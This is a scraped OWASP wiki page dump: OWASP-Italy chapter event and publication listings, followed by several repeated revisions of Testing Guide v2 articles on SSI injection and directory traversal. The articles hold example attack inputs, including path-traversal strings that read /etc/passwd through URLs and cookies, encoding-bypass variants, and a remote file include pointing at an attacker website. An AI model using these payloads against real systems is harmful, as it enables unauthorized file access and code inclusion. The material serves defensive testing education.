Alberto Revelli and Matteo Meucci will partecipate as speakers at the seminar: "Web Application Security: guidelines and security auditing for web applications". The event is organized and managed by the CLUSIT.

Where: Sheraton Roma Hotel - Viale Del Pattinaggio, 100 When: 10,30 - 17,00 Who: Matteo Meucci and Alberto Revelli Link: http://www.infosecurity.it/Roma/programma.php

Agenda: -- I Session -- Introduction to Web Application Security • Which are the risks? • Risk assessment of a web application • Core pillars of web security How to develop secure web applications: • Guidelines and case-studies

-- II Session -- How to realize a security audit of a web application • The methodology OWASP Penetration Testing • The tools: OWASP WebScarab • Hands-on web application vulnerabilities: OWASP WebGoat • Advanced SQL Injection.

 

=== March 1st, 2006 - OWASP-Boston, Microsoft ===

----

Thanks to Jim Weiler (OWASP-Boston Chair), Matteo Meucci has presented "Anatomy of two web attacks" at the OWASP-Boston meeting of march. [http://www.owasp.org/index.php/Boston More info here]

=== November 5th, 2005 - IDC - European Banking Forum ===

----

Thanks to Raoul Chiesa (Director of Communication OWASP-Italy), we have had a great speech at the IDC European IT Banking Forum 2005 (18 Nov 2005). http://www.idc.com/italy/events/banking05/banking05_agenda.jsp Agenda:

*New standards for the ICT security auditing in the italian banking scenario: OSSTMM and OWASP. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy and Matteo Meucci, OWASP-Italy Chair
*Workshop: unusual form of attacks and banking system violation: live experience. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy.

You can download the report [http://cdn.idc.com/italy/downloads/report_banking05_eng.pdf here].

You can download the Case-Study of a vulnerable Home Banking Web Application [http://www.owasp.org/docroot/owasp/misc/IDC_BankingForum05v1.ppt here].

=== October 5th, 2005 - OWASP-Italy@SMAU2005 ===

----

SMAU is the 42a International ICT & Consumer Electronics Exhibition for Italy. Alberto Revelli (our Technical Director) and Matteo Meucci have conducted a seminar talking about Web Application Security. Alberto has presented his new project: [http://sqlninja.sourceforge.net sqlninja]. Very cool!!

http://www.webb.it/event/eventview/4488/1/progetto_owasp__case_study_di_applicativi_web_vulnerabili

=== May 25th, 2005 - ISACA Rome 2nd meeting ===

----

May 25th we'll be in ISACA Rome to present OWASP WebGoat and a real case of a Web Application Vulnerability. Every one is invited to join the meeting.

Here is the agenda: 14.30 Registration 14.45 Matteo Meucci - Web Application Security Phase II - OWASP WebScarab and PenTest Checklist

*A case-study of a Web Application Vulnerability: MMS Spoofing

--- Web Application analysis --- Authentication and Billing of the MMS service --- Vulnerabilities --- Attack Analysis

*Learning the most common web application vulnerabilities: OWASP WebGoat

--- Http Basics --- HTML Clues --- Hidden Field Tampering --- How to spoof a Session Cookie --- Stored Cross Site Scripting --- Command Injection --- SQL Injection --- Fail Open Authentication

The meeting is hold at: Via Volturno, 65 (Rome) - Auditorium ATAC

You can download the presentation [http://www.isacaroma.it/pdf/050525/OWASP.zip here].

=== May 18th, 2005 - Workshop on Computer Crime 2005 ===

----

 May 18th, 2005 OWASP-Italy is invited to present OWASP Top 10 to the "Workshop on Computer Crime 2005" titled: "EVOLUZIONI NORMATIVE E RECENTI PROBLEMATICHE DI SICUREZZA"

The meeting is held at: Sala delle conferenze dell'Istituto Centrale della Banche Popolari Italiane Via Verziere, 11

You can download the presentation [http://www.owasp.org/images/a/aa/Top10-ComputerCrimes.ppt here].

=== March 31th, 2005 - ISACA Rome meeting ===

----

March 31th we'll be in ISACA Rome to present OWASP and the Web Application Security. Every one is invited to join the meeting.

Here is the agenda: 14.15 Registration 14.30 Matteo Meucci - Web Application Security - OWASP Guide: how to build secure web application - How to test your Web Application: WebScarab and the WebApp PenTest Checklist - How to learn the most common web application vulnerability: WebGoat - The Top Ten WebApp vulnerabilities - Common error on developing Web Application: Authentication mechanisms not "secure" Buffer Overflow and crash of the service Thief of identity: Cross Site Scripting Manipulation of company data: SQL Injection Reserved information: misconfiguration Bad session management and thief of identity - OWASP-Italy: projects and next challenges

The meeting is hold at: Via Volturno, 65 (Rome) - Auditorium ATAC http://www.isacaroma.it/html/GiornateDiStudio.html

You can download the presentation [http://www.isacaroma.it/pdf/050331/meucci.zip here].

=== March 21th, 2005 - OWASP-Italy conducts a seminar in AlmaWeb ===

----

March, the 21th OWASP-Italy has been invited at the University of Bologna to conduct a seminar regards to [http://www.almaweb.unibo.it/830.dyn Master in Management and Information Technology] titled “Web Application Security and OWASP”.

Here is the agenda: - OWASP & Web Application Security - Common Web Application Vulnerabilities - A real case of web application vulnerability: MMS Spoofing&Billing - Training: WebGoat

==== Publications ====

=== October 2009 Interview on "Il sole 24 ore" ===
----

[http://www.owasp.org/images/5/5c/Nova09.pdf Gary McGraw and Matteo Meucci] interviewed by NOVA, talking about BSIMM and OWASP.

=== March, 2007 Interview on HTML.it ===

----

Luca Carettoni has published an interview to OWASP-Italy (OWASP interviews OWASP :) ) [http://blog.html.it/archivi/2007/02/26/quattro-chiacchiere-con-owasp-italia.php Here] the full article.

=== October, 2006 ISACA Roma interviews OWASP-Italy ===

----

After the speeches that OWASP-Italy has done at [http://www.smau.it/catnews.asp?l=2&codcat=385 SMAU E-Academy 2006], ISACA Roma has interviewed some of the people of the Italian chapter. Follow the links for the full interviews (in italian): [[http://www.isacaroma.it/html/newsletter/node/276 Matteo Meucci]] [[http://www.isacaroma.it/html/newsletter/node/287 Alberto Revelli ]] [[http://www.isacaroma.it/html/newsletter/node/282 Antonio Parata]] [[http://www.isacaroma.it/html/newsletter/node/285 Paolo Perego]] [[http://www.isacaroma.it/html/newsletter/node/322 Stefano Di Paola & Giorgio Fedon]]

=== Aug, 2006 - Article on Banca Finanza magazine ===

----

Banca Finanza, the italian magazine about finance and banking, has interviewed Raoul Chiesa talking about the new risks for the on-line banking security. Raoul speaks about OWASP and web application security [[Media:042006BF.pdf]]

=== June, 2006 - Quaderno CLUSIT ===

----

CLUSIT has published a book entitled: "La verifica della sicurezza di applicazioni Web-based e il progetto OWASP". Several OWASP-Italy members (R.Chiesa, L.De Santis, M.Graziani, L.Legato, M.Meucci, A.Revelli) have contributed to the writing. The document is now reserved to CLUSIT members, but it will be public in about 3 months.

=== June, 2006 - Paper on SQL Injection and Inference on PHP/MySQLInference ===

----

Antonio "s4tan" Parata has published an article about SQL Injection based on Inference for testing web application on PHP/MySQL platform. [http://www.ictsc.it/papers/sqlInferenceOnMySql.html Here]you can read the full article.

=== May, 2006 - Published an article about OWASP and Top-10 Vulnerabilities ===

----

Luca Carettoni has published the article "La sicurezza delle applicazioni Web secondo l'Open Web Application Security Project". [http://sicurezza.html.it/articoli/leggi/1721/la-sicurezza-delle-applicazioni-web-secondo-lopen-/ Here]you can read the full article.

=== June, 2005 - OWASP Pen Test Checklist v 1.1 in Italian ===

----

Thanks to Massimiliano Graziani we have translated in italian the "OWASP Pen Test Checklist v.1.1". You can download it [http://www.owasp.org/documentation/testing.html here.] Thanks to the collaboration with CLUSIT, this doc is available also [http://www.clusit.it/whitepapers.htm here.]

=== May, 2005 - Isaca Roma Newsletter about OWASP-Italy ===

----

ISACA Roma Newsletter has published an [http://www.isacaroma.it/html/newsletter/?q=node/78 interview to OWASP-Italy]

=== April, 2005 - Published "MMS Spoofing" ===

----

We have published a presentation describing a detailed case study of a web application vulnerabilty [http://www.owasp.org/images/7/72/MMS_Spoofing.ppt (MMS Spoofing)].

Jim Hewitt, CISSP PMP working at CGI-AMS, affirms (slide#78): "Very interesting analysis of spoofed cell phone messaging and fraudulent billing". See: www.techvalleynyissa.org/Resources/2005_07_WebApplicationSecurity.ppt

=== April, 2005 - Published an article on ICT Security magazine ===

----

We have written an article describing the OWASP projects, Web Application Security and the next challenges. '''ICT Security'''.(the italian magazine about Information Security) has published the article on the number 33 - April 2005.

=== March, 2005 - OWASP Top-10 in Italian ===

----

Thanks to Matteo Paolelli we have translated the '''"OWASP Top Ten Vulnerabilties in Web Application Security"''' in italian language. You can download it [http://www.owasp.org/docroot/owasp/projects/topten/OWASPTopTen2004-ITA.pdf here].

 

----

==== Tools & Research ====

----

=== Nov, 2007 - sqlmap v0.5 ===

Bernardo Damele and Daniele Bellucci have released the fifth versions of the tool [http://sqlmap.sourceforge.net sqlmap]. sqlmap is an automatic SQL injection tool entirely developed in Python. It is capable to perform an extensive database management system back-end fingerprint, retrieve remote DBMS databases, usernames, tables, columns, enumerate entire DBMS, read system files and much more taking advantage of web application programming security flaws that lead to SQL injection vulnerabilities.

You can download the latest stable version from its [https://sourceforge.net/project/showfiles.php?group_id=171598&package_id=196107 SourceForge File List page] or the latest development version from its [https://sqlmap.svn.sourceforge.net/svnroot/sqlmap SourceForge SVN repository].

=== Dec, 2006 - sqlmap v0.2 ===

Bernardo Damele and Daniele Bellucci have released a second version of the tool "sqlmap" for Automatic Blind SQL Injection. [http://sqlmap.sourceforge.net/ Here] you can download the tool

=== September, 2006 - Wisec Project ===

Stefano Di Paola is developing Wisec - The Wiki Security Project [http://www.wisec.it Here] you can accesses the project.

=== July, 2006 - Sqlmap v0.0.1 ===

Daniele Bellucci has developed a first version of the tool "sqlmap" for Automatic Blind SQL Injection. [http://www.linux.it/~belch/?p=17 Here] you can download the tool

----

__NOTOC__ <headertabs />

[[Category:OWASP_Chapter]]
[[Category:Europe]]

File:AdoptOSSManifest-OWASPItaly.pdf

2015-05-15T07:14:05Z

Ikkisoft: OWASP Italy - Adopt OSS Manifest

OWASP Italy - Adopt OSS Manifest

Testing for SSI Injection (OTG-INPVAL-009)

2006-11-08T11:03:01Z

Ikkisoft: /* Tools */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Brief Summary ==

Web servers usually give to the developer the possibility to add small pieces of dynamic code inside static html pages, without having to play with full-fledged server-side or client-side languages. This feature is incarnated by the '''Server-Side Includes''' ('''SSI'''), a very simple extensions that can enable an attacker to inject code into html pages, or even perform remote code execution. 

== Description of the Issue ==

Server-Side Includes are directives that the web server parses before serving the page to the user. They represent an alternative to writing CGI program or embedding code using server-side scripting languages, when there's only need to perform very simple tasks. Common SSI implementations provide commands to include external files, to set and print web server CGI environment variables and to execute external CGI scripts or system commands. 

Putting an SSI directive into a static html document is as easy as writing a piece of code like the following: 

<pre>

</pre>

to print out the current time. 

<pre>

<pre>

to include the output of a CGI script. 

<pre>

</pre>

to include the content of a file. 

<pre>

</pre>

to include the output of a system command. 

Then, if the web server's SSI support is enabled, the server will parse these directives, both in the body or inside the headers. In the default configuration, usually, most web servers don't allow the use of the '''''exec''''' directive to execute system commands. 

As in every bad input validation situation, problems arise when the user of a web application is allowed to provide data that's going to make the application or the web server itself behave in an unforseen manner. Talking about SSI injection, the attacker could be able to provide an input that, if inserted by the application (or maybe directly by te server) into a dynamically generated page would be parsed as SSI directives. 

We are talking about an issue very similar to a classical scripting language injection problem; maybe less dangerous, as the SSI directive are not comparable to a real scripting language and because the web server needs to be configured to allow SSI; but also simpler to exploit, as SSI directives easy to understand and powerful enough to output the content of files and to execute system commands. 

== Black Box testing ==

The first thing to do when testing in a Black Box fashion is finding if the web server actually support SSI directives. The answer is almost certainly a yes, as SSI support is quite common. To find out we just need to discover which kind of web server is running on our target, using classical information gathering techniques. 

Whether we succeded or not in discovering this piece of information, we could guess if SSI are supported just looking at the content of the target web site we are testing: if it makes use of '''''.shtml''''' file then SSI are probably supported, as this extension is used to identify pages containing these directives. Unfortunately, the use of the '''''shtml''''' extension is not mandatory, so not having found any '''''shtml''''' files doesn't necessarily mean that the target is not prone to SSI injection attacks. 

Let's go to the next step, which is needed not only to find out if an SSI injection attack is really plausible, but also to identify the input points we can use to inject our malicious code. 

In this step the testing activity is exactly the same needed to test for other code injection vulnerabilities. We need to find every page where the user is allowed to submit some kind of input and verify whether the application is correctly validating the submitted input or, otherwise, if we could provide data that is going to be displayed unmodified (as error message, forum post, etc.). Beside common user supplied data, input vectors that are always to be considered are HTTP request headers and cookies content, that can be easily forged. 

Once we have a list of potential injection points, we can check if the input is correctly validated and then find out where in the web site the data we provided are going to be displayed. We need to make sure that we are going to be able to make characters like that used in SSI directives: 

<pre>
< ! # = / . " - > and [a-zA-Z0-9]
</pre>

go through the application and be parsed by the server at some point. 

Exploiting the lack of validation, is as easy as submitting, for example, a string like: 

<pre>

</pre>

in a input form, instead of the classical: 

<pre>
<script>alert("XSS")</script>
</pre>

The directive would be then parsed by the server next time it needs to serve the given page, thus including the content of the Unix standard password file. 

The injection can be performed also in HTTP headers, if the web application is going to use that data to build a dynamically generated page: 

<pre>
GET / HTTP/1.0
Referer: 
User-Agent: 
</pre>

== Gray Box testing and example ==

Being able to review the application source code we can quite easily find out: 
# if SSI directives are used; if they are, then the web server is going to have SSI support enabled, making SSI injection at least a potential issue to investigate; 
# where user input, cookie content and http headers are handled; the complete input vectors list is then quickly built; 
# how the input is handled, what kind of filtering is performed, what characters the application is not letting through and how many type of encoding are taken into account. 

Performing these steps is mostly a matter of using grep, to find the right keywords inside the source code (SSI directives, CGI environment variables, variables assignment involving user input, filtering functions and so on). 

== References ==

* IIS: Notes on Server-Side Includes (SSI) syntax 
http://support.microsoft.com/kb/203064[http://support.microsoft.com/kb/203064] 

* Apache Tutorial: Introduction to Server Side Includes 
http://httpd.apache.org/docs/1.3/howto/ssi.html[http://httpd.apache.org/docs/1.3/howto/ssi.html] 

* Apache: Module mod_include 
http://httpd.apache.org/docs/1.3/mod/mod_include.html[http://httpd.apache.org/docs/1.3/mod/mod_include.html] 

* Apache: Security Tips for Server Configuration 
http://httpd.apache.org/docs/1.3/misc/security_tips.html#ssi[http://httpd.apache.org/docs/1.3/misc/security_tips.html#ssi] 

* Header Based Exploitation 
http://www.cgisecurity.net/papers/header-based-exploitation.txt[http://www.cgisecurity.net/papers/header-based-exploitation.txt] 

* SSI Injection instead of JavaScript Malware 
http://jeremiahgrossman.blogspot.com/2006/08/ssi-injection-instead-of-javascript.html[http://jeremiahgrossman.blogspot.com/2006/08/ssi-injection-instead-of-javascript.html] 

== Tools ==

* Web Proxy (Burp Suite[http://portswigger.net], Paros[http://www.parosproxy.org/index.shtml], WebScarab[http://www.owasp.org/index.php/OWASP_WebScarab_Project])
* Enconding/Decoding tools
* String searcher (grep[http://www.gnu.org/software/grep/], your favorite text editor)

{{Category:OWASP Testing Project AoC}}

Testing for SSI Injection (OTG-INPVAL-009)

2006-11-08T11:00:39Z

Ikkisoft: /* Description of the Issue */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Brief Summary ==

Web servers usually give to the developer the possibility to add small pieces of dynamic code inside static html pages, without having to play with full-fledged server-side or client-side languages. This feature is incarnated by the '''Server-Side Includes''' ('''SSI'''), a very simple extensions that can enable an attacker to inject code into html pages, or even perform remote code execution. 

== Description of the Issue ==

Server-Side Includes are directives that the web server parses before serving the page to the user. They represent an alternative to writing CGI program or embedding code using server-side scripting languages, when there's only need to perform very simple tasks. Common SSI implementations provide commands to include external files, to set and print web server CGI environment variables and to execute external CGI scripts or system commands. 

Putting an SSI directive into a static html document is as easy as writing a piece of code like the following: 

<pre>

</pre>

to print out the current time. 

<pre>

<pre>

to include the output of a CGI script. 

<pre>

</pre>

to include the content of a file. 

<pre>

</pre>

to include the output of a system command. 

Then, if the web server's SSI support is enabled, the server will parse these directives, both in the body or inside the headers. In the default configuration, usually, most web servers don't allow the use of the '''''exec''''' directive to execute system commands. 

As in every bad input validation situation, problems arise when the user of a web application is allowed to provide data that's going to make the application or the web server itself behave in an unforseen manner. Talking about SSI injection, the attacker could be able to provide an input that, if inserted by the application (or maybe directly by te server) into a dynamically generated page would be parsed as SSI directives. 

We are talking about an issue very similar to a classical scripting language injection problem; maybe less dangerous, as the SSI directive are not comparable to a real scripting language and because the web server needs to be configured to allow SSI; but also simpler to exploit, as SSI directives easy to understand and powerful enough to output the content of files and to execute system commands. 

== Black Box testing ==

The first thing to do when testing in a Black Box fashion is finding if the web server actually support SSI directives. The answer is almost certainly a yes, as SSI support is quite common. To find out we just need to discover which kind of web server is running on our target, using classical information gathering techniques. 

Whether we succeded or not in discovering this piece of information, we could guess if SSI are supported just looking at the content of the target web site we are testing: if it makes use of '''''.shtml''''' file then SSI are probably supported, as this extension is used to identify pages containing these directives. Unfortunately, the use of the '''''shtml''''' extension is not mandatory, so not having found any '''''shtml''''' files doesn't necessarily mean that the target is not prone to SSI injection attacks. 

Let's go to the next step, which is needed not only to find out if an SSI injection attack is really plausible, but also to identify the input points we can use to inject our malicious code. 

In this step the testing activity is exactly the same needed to test for other code injection vulnerabilities. We need to find every page where the user is allowed to submit some kind of input and verify whether the application is correctly validating the submitted input or, otherwise, if we could provide data that is going to be displayed unmodified (as error message, forum post, etc.). Beside common user supplied data, input vectors that are always to be considered are HTTP request headers and cookies content, that can be easily forged. 

Once we have a list of potential injection points, we can check if the input is correctly validated and then find out where in the web site the data we provided are going to be displayed. We need to make sure that we are going to be able to make characters like that used in SSI directives: 

<pre>
< ! # = / . " - > and [a-zA-Z0-9]
</pre>

go through the application and be parsed by the server at some point. 

Exploiting the lack of validation, is as easy as submitting, for example, a string like: 

<pre>

</pre>

in a input form, instead of the classical: 

<pre>
<script>alert("XSS")</script>
</pre>

The directive would be then parsed by the server next time it needs to serve the given page, thus including the content of the Unix standard password file. 

The injection can be performed also in HTTP headers, if the web application is going to use that data to build a dynamically generated page: 

<pre>
GET / HTTP/1.0
Referer: 
User-Agent: 
</pre>

== Gray Box testing and example ==

Being able to review the application source code we can quite easily find out: 
# if SSI directives are used; if they are, then the web server is going to have SSI support enabled, making SSI injection at least a potential issue to investigate; 
# where user input, cookie content and http headers are handled; the complete input vectors list is then quickly built; 
# how the input is handled, what kind of filtering is performed, what characters the application is not letting through and how many type of encoding are taken into account. 

Performing these steps is mostly a matter of using grep, to find the right keywords inside the source code (SSI directives, CGI environment variables, variables assignment involving user input, filtering functions and so on). 

== References ==

* IIS: Notes on Server-Side Includes (SSI) syntax 
http://support.microsoft.com/kb/203064[http://support.microsoft.com/kb/203064] 

* Apache Tutorial: Introduction to Server Side Includes 
http://httpd.apache.org/docs/1.3/howto/ssi.html[http://httpd.apache.org/docs/1.3/howto/ssi.html] 

* Apache: Module mod_include 
http://httpd.apache.org/docs/1.3/mod/mod_include.html[http://httpd.apache.org/docs/1.3/mod/mod_include.html] 

* Apache: Security Tips for Server Configuration 
http://httpd.apache.org/docs/1.3/misc/security_tips.html#ssi[http://httpd.apache.org/docs/1.3/misc/security_tips.html#ssi] 

* Header Based Exploitation 
http://www.cgisecurity.net/papers/header-based-exploitation.txt[http://www.cgisecurity.net/papers/header-based-exploitation.txt] 

* SSI Injection instead of JavaScript Malware 
http://jeremiahgrossman.blogspot.com/2006/08/ssi-injection-instead-of-javascript.html[http://jeremiahgrossman.blogspot.com/2006/08/ssi-injection-instead-of-javascript.html] 

== Tools ==

* Web Proxy (Burp Suite[http://portswigger.net], Paros[http://www.parosproxy.org/index.shtml], WebScarab[http://www.owasp.org/index.php/OWASP_WebScarab_Project], Suru Web Proxy[http://www.sensepost.com/research/suru/])
* Enconding/Decoding tools
* String searcher (grep[http://www.gnu.org/software/grep/], your favorite text editor)

{{Category:OWASP Testing Project AoC}}

Testing for Directory Traversal

2006-11-06T16:41:06Z

Ikkisoft: /* Description of the Issue */

{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
Many web applications use and manage files as part of their daily operation. Using input validation methods that have not been well designed or deployed, an aggressor could exploit the system in order to read/write files that are not intended to be accessible; in particular situations it could be possible to execute arbitrary code or system commands.
 

== Description of the Issue ==
Traditionally web servers and web applications implement authentication mechanisms in order to control the access to files and resources.
Web servers try to confine users' files inside a "root directory" or "web document root" which represents a physical directory on the file system; users have just to consider this directory as the base directory into the hierarchical structure of the web application.
The definition of the privileges is made using ''Access Control Lists'' (ACL) that identify which users and groups are supposed to be able to access, modify or execute a specific file on the server.
These mechanisms are designed to prevent the access to sensible files from malicious users (example: the common ''/etc/passwd'' into Unix-like platform) or to avoid the execution of system commands.

Many web applications use server-side scripts to include different kinds of files: is quite common to use this method to manage graphics templates, load static texts, and so on. Unfortunately, these applications show security issues if the input parameters used (form parameters, cookies values) are not correctly validated.

In web servers and web applications too, this kind of problem arises in directory traversal/file include attacks; exploiting this kind of vulnerability an attacker is able read directory and files which normally he/she couldn't read, access data outside the web document root, include scripts and other kinds of files from external websites.

For the purpose of the OWASP Testing Guide, we will just consider the security threats related to web applications and not to web server (as the infamous "%5c escape code" into Microsoft IIS web server). We will provide further reading, in the references section, for the interested readers.

This kind of attack is also know as the '''dot-dot-slash''' attack (../), '''path traversal''', '''directory climbing''', '''backtracking'''.

During an assessment, in order to discover directory traversal and file include flaws, we need to perform two different stages:
* ('''a''') '''Input Vectors Enumeration''' (a systematical evaluation of each input vector)
* ('''b''') '''Testing Techniques''' (a methodical evaluation of each attack technique used by an aggressor to exploit the vulnerability)
 

== Black Box testing and example ==
('''a''') '''Input Vectors Enumeration''' 
In order to determine which part of the application is vulnerable to input validation bypassing, the tester needs to enumerate all part of the application which accept content from the user. This also includes HTTP GET and POST queries and common options like file uploads and html forms.

Examples of checks to be performed at this stage include:

* Parameters which you could recognize as file related into HTTP requests?
* Strange file extensions?
* Interesting variable name?
<pre>
http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm
</pre>

* Is it possible to identify cookies used by the web application for the dynamic generation of pages/templates?

<pre>
Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed
</pre>
 

('''b''') '''Testing Techniques'''

The next stage of testing is analysing the input validation functions present into the web application.

Using the previous example, the dynamic page called ''getUserProfile.jsp'' loads static informations from a file, showing the content to users. An attacker could insert the malicious string "''../../../../etc/passwd''" to include the password hash file of a Linux/Unix system.
Obviously this kind of attack is possible only if the validation checkpoint fails; according to the filesystem privileges, the web application itself must be able to read the file.

To sucessfully test for this flaw, the tester needs to have knowledge on the system being tested and the location of the files being requested. There is no point requesting /etc/passwd from a IIS web server

<pre>
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
</pre>

For the cookies example, we have:
<pre>
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
</pre>

It's also possible to include files, and scripts, located on external website.
<pre>
http://example.com/index.php?file=http://www.owasp.org/malicioustxt
</pre>

The following example will demonstrate how is it possible to show the source code of a CGI component, without using any path traversal chars.
<pre>
http://example.com/main.cgi?home=main.cgi
</pre>

The component called "''main.cgi''" is located in the same directory as the normal HTML static files used by the application.
In some cases the tester needs to encode the requests using special charecters (like the "'''.'''" dot, "'''%00'''" null, ...) in order to bypass file extension controls and/or stop the script execution.

Tip
It's a common mistake by developers to not expect every form of encoding and therefore only do validation for basic encoded content. If at first your test string isn't sucessful, try another encoding scheme.

Each operating system use different chars as path separator:

''Unix-like OS'':
<pre>
root directory: "/"
directory separator: "/"
</pre>

''Windows OS'':
<pre>
root directory: "<drive letter>:\"
directory separator: "\" but also "/"
</pre>
(Usually on Win, the directory traversal attack is limited to a single partition)

''Classic Mac OS'':
<pre>
root directory: "<drive letter>:"
directory separator: ":"
</pre>
 
We should take in account the following chars encoding:

* URL encoding e double URL encoding

<pre>
%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\ and so on.
</pre>

* Unicode/UTF-8 Encoding (It just works in systems which are able to accept overlong UTF-8 sequences)

<pre>
..%c0%af represents ../
..%c1%9c represents ..\
</pre>
 

== Gray Box testing and example ==
When the analysis is performed with a White Box approach, we have to follow the same methodology as in the Black Box Testing. However, since we can review the source code is possible to search the input vectors (''stage ('''a''') of the testing'') more easily and accurately.
During a source code review we can use simple tools (as the ''grep'' command) to search one or more common patterns into the application code: inclusion functions/methods, filesystem operations and so on.

<pre>
PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ...
JSP/Servlet: java.io.File(), java.io.FileReader(), ...
ASP: include file, include virtual, ...
</pre>

Using online code search engines (Google CodeSearch[http://www.google.com/codesearch], Koders[http://www.koders.com/]) is also possible to find directory traversal flaws into OpenSource software published on Internet.

For PHP, we can use:
<pre>
lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)
</pre>
 
Using the Gray Box Testing method, it is possible to discover vulnerabilities that are usually harder to discover, or even impossible, to find during a standard Black Box assessment.

Some web applications generate dynamic pages using values and parameters stored into a database; It may be possible to insert specially crafted directory traversal strings when the application saves the data. This kind of security problems is difficult to discover due to the fact the parameters inside the inclusion functions seem internal and "safe" but otherwise they are not.

Additionally, reviewing the source code, it is possible to analyze the functions that are supposed to handle invalid input: some developers try to change invalid input to make it valid, avoiding warnings and errors. These functions are usually prone to security flaws.

Considering a web application with these instructions:
<pre>
filename = Request.QueryString(“file”);
Replace(filename, “/”,”\”);
Replace(filename, “..\”,””);
</pre>

Testing for the flaw is acheived by:
<pre>
file=....//....//boot.ini
file=....\\....\\boot.ini
file= ..\..\boot.ini
</pre>
 

== References ==
* Security Risks of Unicode
http://www.schneier.com/crypto-gram-0007.html[http://www.schneier.com/crypto-gram-0007.html]
* phpBB Attachment Mod Directory Traversal HTTP POST Injection
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html[http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html]
== Tools ==
* Web Proxy (''Burp Suite''[http://portswigger.net], ''Paros''[http://www.parosproxy.org/index.shtml], ''WebScarab''[http://www.owasp.org/index.php/OWASP_WebScarab_Project])
* Enconding/Decoding tools
* String searcher (''grep''[http://www.gnu.org/software/grep/], your favorite text editor)
 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]

Testing for Directory Traversal

2006-11-06T13:21:30Z

Ikkisoft: /* Tools */

{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
Nowadays, many web applications use and manage files. Using input validation methods not well designed, an aggressor could exploit the system in order to read/write files that are not intended to be accessible; in particular situations it could be possible to execute arbitrary code or system commands.
 

== Description of the Issue ==
Usually, web servers and web applications implement authentication mechanisms in order to control the access to files and resources.
Web servers try to confine users' files inside a "root directory" or "web document root" which represents a physical directory on the file system; users have just to consider this directory as the base directory into the hierarchical structure of the web application.
The definition of the privileges is made using ''Access Control Lists'' (ACL) that identify which users and groups are supposed to be able to access, modify or execute a specific file on the server.
These mechanisms are designed to prevent the access to sensible files from malicious users (example: the common ''/etc/passwd'' into Unix-like platform) or to avoid the execution of system commands.

Many web applications use server-side scripts to include different kinds of files: is quite common to use this method to manage graphics templates, load static texts, and so on. Unfortunately, these applications show security issues if the input parameters used (form parameters, cookies values, ...) are not well validated.

In web servers and web applications too, this kind of problem arises in directory traversal/file include attacks; exploiting this kind of vulnerability an attacker is able read directory and files which normally he/she couldn't read, access data outside the web document root, include scripts and other kinds of files from external websites.

For the purpose of the OWASP Testing Guide, we will just consider the security threats related to web applications and not to web server (as the infamous "%5c escape code" into Microsoft IIS web server). We will provide further reading, in the references section, for the interested readers.

This kind of attack is also know as the '''dot-dot-slash''' attack (../), '''path traversal''', '''directory climbing''', '''backtracking'''.

During an assessment, in order to discover directory traversal and file include flaws, we need to perform two different stages:
* ('''a''') '''Input Vectors Enumeration''' (a systematical evaluation of each input vector)
* ('''b''') '''Exploiting Techniques''' (a methodical evaluation of each attack technique used by an aggressor to exploit the vulnerability)
 

== Black Box testing and example ==
('''a''') '''Input Vectors Enumeration''' 
As others unvalidated input vulnerabilities, in which an aggressor exploit the insufficient ''validation''/''sanitization'' process, also for the directory traversal flaw is necessary to consider each parameter whose value is provided by the users: form parameters (GET/POST), values inside cookies, values stored into databases from previous client-server interactions, others HTTP header parameters.

Examples of checks to be performed at this stage include:

* Do you notice some parameters which you could recognize as file related into HTTP requests?
* Strange file extension?
* Curious variable name?
<pre>
http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm
</pre>

* Is it possible to identify cookies used by the web application for the dynamic generation of pages/templates?

<pre>
Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed
</pre>
 

('''b''') '''Exploit Techniques'''

As next step, during the assessment, we need to analyze the different attack techniques used by an aggressor in order to evaluate the input validation functions present into the web application.

Using the previous example, the dynamic page called ''getUserProfile.jsp'' loads static informations from a file, showing the content to users. An attacker could insert the malicious string "''../../../../etc/passwd''" to include the password hash file of a Linux/Unix system.
Obviously this kind of attack is possible only if the validation checkpoint fails; according to the filesystem privileges, the web application itself must be able to read the file.

To exploit this flaw, an aggressor needs some knowledge on where to blindly find any default files and directories on the system: guessing and trying again until the attack works is usually an easy way to perform a directory climbing.

<pre>
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
</pre>

For the cookies example, we have:
<pre>
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
</pre>

It's also possible to include files (''scripts too!'') located on external website. Let's see:
<pre>
http://example.com/index.php?file=http://www.attackerwebsite.com/malicioustxt
</pre>

The following example will demonstrate how is it possible to show the source code of a CGI component, without using any path traversal chars.
<pre>
http://example.com/main.cgi?home=main.cgi
</pre>

The component called "''main.cgi''" is located into the same directory of the normal HTML static files used by the application.
Sometimes, when the attackers are not so lucky, they need to use special chars (like the "'''.'''" dot, "'''%00'''" null, ...) in order to bypass file extension controls and/or stop the script execution.

It's also very important to notice that when developers implement an input validation function sometimes they don't consider every possible chars encoding.
During a Black Box Test is useful to try to inject every kind of chars encoding and also every kind of path definition.

Each operating system use different chars as path separator:

''Unix-like OS'':
<pre>
